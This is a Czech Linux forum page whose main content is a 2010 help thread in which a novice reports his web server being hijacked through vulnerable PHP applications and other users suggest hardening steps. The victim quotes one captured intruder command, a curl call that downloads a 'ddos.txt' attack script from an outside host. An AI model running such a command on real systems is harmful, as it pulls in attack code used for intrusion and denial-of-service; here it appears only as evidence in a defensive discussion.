abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

dnes 17:22 | Komunita

Martin Flöser představil na svém blogu projekt XFree KWin. Cílem projektu je rozběhnout správce oken KWin na Waylandu bez XWaylandu [reddit].

Ladislav Hagara | Komentářů: 2
dnes 16:55 | Komunita

Do pátku 29. září probíhá v Praze v hotelu Hilton konference SUSECON 2017 pořádaná společností SUSE. Dění na konferenci lze sledovat na Twitteru. Nils Brauckmann, CEO společnosti SUSE, vítá účastníky konference na YouTube.

Ladislav Hagara | Komentářů: 0
dnes 07:00 | Komunita

Příspěvek na blogu společnosti Yubico informuje o začlenění podpory bezpečnostních klíčů FIDO U2F do Firefoxu Nightly. Dosud bylo možné dvoufázové ověření pomocí FIDO U2F ve Firefoxu zajistit pouze pomocí doplňku.

Ladislav Hagara | Komentářů: 3
dnes 06:00 | Humor

Adobe PSIRT (Adobe Product Security Incident Response Team) neúmyslně zveřejnil (archive) na svém blogu svůj soukromý OpenPGP klíč. Klíč byl revokován a vygenerován nový. Nelze nezmínit xkcd 1553 - Veřejný klíč.

Ladislav Hagara | Komentářů: 1
včera 20:00 | Nová verze

Byla vydána (cgit) verze 0.99 svobodného nelineárního video editoru Pitivi. Jedná se o release candidate verze 1.0. Přehled úkolů, které je nutno ještě dodělat, na Phabricatoru. Pitivi je k dispozici také ve formátu Flatpak.

Ladislav Hagara | Komentářů: 0
včera 17:11 | Komunita

Microsoft s Canonicalem představili linuxové jádro Ubuntu optimalizováno pro cloudové služby Microsoft Azure (linux-azure). Jako výchozí je toto menší a výkonnější jádro použito již v Ubuntu Cloud Images for Ubuntu 16.04 LTS. Canonical zatím nenabízí patchování tohoto jádra za běhu systému (Canonical Livepatch Service).

Ladislav Hagara | Komentářů: 1
včera 14:55 | Komunita

Facebook oznámil, že přelicencuje open source projekty React, Jest, Flow a Immutable.js ze své vlastní kontroverzní licence BSD+Patents na licenci MIT. Stane se tak tento týden s vydáním Reactu 16. Jedním z důvodů přelicencování bylo oznámení nadace Apache, že software pod Facebook BSD+Patents licencí nesmí být součástí produktů pod touto nadací [Hacker News].

Ladislav Hagara | Komentářů: 0
23.9. 21:44 | Nová verze

Po půl roce od vydání verze 9.0 byla vydána verze 10.0 open source alternativy GitHubu, tj. softwarového nástroje s webovým rozhraním umožňujícího spolupráci na zdrojových kódech, GitLab (Wikipedie). Představení nových vlastností v příspěvku na blogu a na YouTube.

Ladislav Hagara | Komentářů: 0
22.9. 18:11 | Nová verze

Společnost Oracle oficiálně oznámila vydání Java SE 9 (JDK 9), Java Platform Enterprise Edition 8 (Java EE 8) a Java EE 8 Software Development Kit (SDK). Java SE 9 přináší více než 150 nových vlastností.

Ladislav Hagara | Komentářů: 0
22.9. 12:11 | Komunita

Na Humble Bundle lze získat hororovou počítačovou hru Outlast (Wikipedie) běžící také v Linuxu zdarma. Speciální akce končí v sobotu v 19:00.

Ladislav Hagara | Komentářů: 2
Těžíte nějakou kryptoměnu?
 (5%)
 (3%)
 (17%)
 (75%)
Celkem 574 hlasů
 Komentářů: 23, poslední včera 18:12
    Rozcestník

    Dotaz: DDOS?? (urgent)

    10.8.2010 01:31 Martin
    DDOS?? (urgent)
    Přečteno: 438×
    Čus chlapi. Jsem začátečník a mám vlastní webserver s ubuntu 9.10. Ted se mi však často stává že se systém přetíží natolik že se nezapne ani LCD. Občas se mi povede chytnout dobrou chvilku a vidim tam ty žrouty: (výpis z webmina) ID USER CPU PŘÍKAZ 9422 www-data 46.3 % /sbin/syslogd 9429 www-data 27.8 % /sbin/klogd -c 1 -x -x 9427 www-data 26.0 % /sbin/syslogd

    No a právě teď jsem tam na chvíli zachytl proces pod tímto příkazem: curl -O http://www.salsayson.com/logs/ddos.txt -O ddos.txt

    Spuštěné to bylo pod www-data. Můžete mi pomoci? Jakou ochranu nasadit na server? Už tam mám firewall, nastavený dokonce i s dhcp. Ale přesto to přes něj projde :( Opravdu jsem ještě neznalý...

    Díky moc

    Odpovědi

    Jendа avatar 10.8.2010 02:31 Jendа | skóre: 74 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Máš tam záškodníka. Ale běží pod www-data, tzn. asi se mu nepodařilo získat roota (to bys ho třeba ani neviděl). Tipnul bych si, že hostuješ nějakou děravou PHP aplikaci, která umožňuje cizím lidem spouštět externí programy (v tomto případě v Perlu).
    Much eRecept, very security, so DH-1024, many TLS1.0, very java, wow.
    10.8.2010 04:14 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    běží tam wordpress, e107, phpbb, oxid eshop. Web s e107 již potíže byli. Dokonce jsem musel několikrát nahrazovat celý root adresář. Na serveru mi také občas mizí obrázky (ze všech cms). Většinou to bývají loga.
    10.8.2010 08:57 NN
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Mam napad pokud jiz nemas "suhosin" pro PHP..

    NN
    10.8.2010 09:10 none
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Pomerne bezna situace. Je potreba zjistit jakou dirou se tam dostava. Nic sloziteho to nebude, nejspis neco v php (obligatni 'include $file' apod. Hledej v logach souvisejicich s tim zaznamem co jsi posilal (podle ip adresy, nazvu souboru apod.). Pokud ten proces bezi, najdes ho v /proc a uvidis i odkud byl spusten. A kdyz uz vis jak to funguje, tak musis vhodne nastavit apache/php/system tak, aby k tomu nemohlo dojit. Opravovat skript php, ktery je takhle deravy je neproduktivni, protoze jich bude pravdepodobne deravych vic a je jen otazkou casu, kdy se to bude opakovat. Nadruhou stranu nechat tam tu diru je taky hrich. Takze jednak opravit php skripty a jednak nakonfiguraovat prostredi tak, aby k tomu nemohlo dochazet. V php zakazat vsechny potencialne nebezpecne funkce (exec, system etc.), kazdemu hostingu dat jineho uzivatele s prislusnymi pravy a tak dale. Neni to jednoduche a neni to neprustrelne, bohuzel. Ale drtivou vetsinu tech utoku eliminujes. Prinejmensim tech robotickych.

    Jojo, provozovat LAMP/LAPP (a vubec jakykoliv) server neni pro kazdeho, je treba neco umet a znat system ktery pouzivas. Pockej az prijdou ucty za datovy prenos, stiznosti na spam na utoky apod. Vyplati se tomu rozumnet nebo to nechat odbornikum ;). Za par stovek ti ten server muze nekdo spravovat a mas klid.
    10.8.2010 12:18 Šangala | skóre: 56 | blog: Dutá Vrba - Wally
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Většina byla již popsána, jen doplním, že před přetížením Vás mohou zachránit limity s vhodným nastavením. Potom se aspoň na ten server pravděpodobně lehce dostanete a může analyzovat a napravovat…
    To, že trpíš stihomamem, ještě neznamená, že po tobě nejdou. ⰞⰏⰉⰓⰀⰜⰉ ⰗⰞⰅⰜⰘ ⰈⰅⰏⰉ ⰒⰑⰎⰉⰁⰕⰅ ⰏⰉ ⰒⰓⰄⰅⰎ ·:⁖⁘⁙†
    11.8.2010 07:50 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Takže mam v ubuntu vytvořit klasickýho uživatele a pak tomu uživateli přidělit root adresář webu? V tý e107 jsem dělal nějaké úpravy, takže sem možná někde nechal chmod 777. To bude určitě ono že? :) Systému ještě moc nerozumim, hlavně struktuře souborů, oprávnění a jejich smysl :D
    11.8.2010 10:29 alkoholik | skóre: 35 | blog: Alkoholik
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    A co si o tom alespon neco malo precist?

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.